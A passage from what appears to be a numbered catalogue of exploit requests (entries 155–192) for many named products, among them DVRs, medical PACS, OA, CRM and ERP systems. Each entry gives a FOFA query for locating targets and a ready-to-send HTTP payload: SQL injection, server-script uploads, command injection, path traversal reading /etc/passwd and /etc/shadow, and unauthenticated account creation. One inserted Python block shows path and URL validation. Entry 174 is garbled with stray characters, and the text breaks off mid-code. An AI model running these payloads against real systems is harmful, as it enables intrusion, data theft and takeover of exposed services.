Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR (HJSOFT) OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR (HJSOFT) downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR (HJSOFT) DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
& i% ~: e& ?; GFOFA:app="金和网络-金和OA"
7 ^) d4 v, ?6 U+ m- a. l. k( TGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.12 F4 f+ ~# r- N+ v/ [! ^2 V; a" f0 M
Host: your-ip
; Y- g5 X; J2 H. {( @. NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 F8 Q* s$ l$ Q" v' D! K/ W: SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ M; W5 m# }, T; R) H. w$ aAccept-Encoding: gzip, deflate, br
; ~/ Z4 L/ m2 L+ f- @' J1 xAccept-Language: zh-CN,zh;q=0.9# a  k2 C" ], ~5 K$ J* Q) j9 J
Connection: close2 e& w9 T9 ~( }6 x* x, f

) P0 H5 o! N  D9 A& T( s
. a+ e! ]+ t3 V) l: ?5 ^1 f) H" i5 F0 I- ]% D; t6 ^0 D' d
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (LANWON clinical viewing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

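Entries 188 and 190 above both hand a client-supplied value straight to the filesystem: a path (file=/etc/passwd) and a URL (poi=file:///etc/passwd). The following is an added example, not code from this compilation or from either vendor, of the two server-side checks that close this class of bug: confining a file parameter to a storage root, and allowlisting the scheme and host of a URL parameter. The storage root, function names and the rejection of private literal addresses are assumptions made for the example.

```python
from __future__ import annotations

import ipaddress
import os
from urllib.parse import unquote, urlsplit

# Assumed storage root for an attachment handler (not taken from the page).
ATTACHMENT_ROOT = "/srv/app/attachments"
# A "fetch this POI" feature only needs web URLs; file:, gopher:, dict: etc. are refused outright.
ALLOWED_SCHEMES = {"http", "https"}


def resolve_attachment(root: str, user_path: str, resolver=os.path.normpath) -> str | None:
    """Map a client-supplied 'file' parameter onto a path inside root.

    Returns the absolute path to serve, or None when the value escapes root:
    absolute paths, '..' segments, percent-encoded variants and NUL bytes.
    The default resolver is purely lexical; pass resolver=os.path.realpath in
    a deployment so a symlink inside root cannot point back out of it.
    """
    decoded = unquote(user_path)
    if "\x00" in decoded:
        return None
    root_abs = resolver(os.path.abspath(root))
    # os.path.join drops root entirely when the second argument is absolute
    # ("/etc/passwd"), so the prefix test below, not the join, is the boundary.
    candidate = resolver(os.path.abspath(os.path.join(root_abs, decoded)))
    if candidate != root_abs and not candidate.startswith(root_abs + os.sep):
        return None
    return candidate


def is_allowed_fetch_url(url: str) -> bool:
    """Accept only http(s) URLs to a hostname or a public literal address."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        return True  # a DNS name: resolve and re-check the address at connect time
    # Literal loopback, RFC 1918, link-local (cloud metadata) and reserved ranges are refused.
    return not (addr.is_loopback or addr.is_private or addr.is_link_local or addr.is_reserved)


if __name__ == "__main__":
    # The two values sent by entries 188 and 190 above.
    print(resolve_attachment(ATTACHMENT_ROOT, "/etc/passwd"))        # None
    print(resolve_attachment(ATTACHMENT_ROOT, "reports/2024.pdf"))   # /srv/app/attachments/reports/2024.pdf
    print(is_allowed_fetch_url("file:///etc/passwd"))                # False
```

The prefix test appends a separator so that /srv/app/attachments2 is not mistaken for a child of /srv/app/attachments; a single unquote is enough when the web framework has already decoded the query string once, and decoding a second time would reopen %252e-style double encoding only if the handler then decodes again itself.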

191. 亿赛通电子文档安全管理系统 (Esafenet electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (Futong Tianxia foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The stored file name is taken from the name query parameter, so the body below is written as a .ashx handler:
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
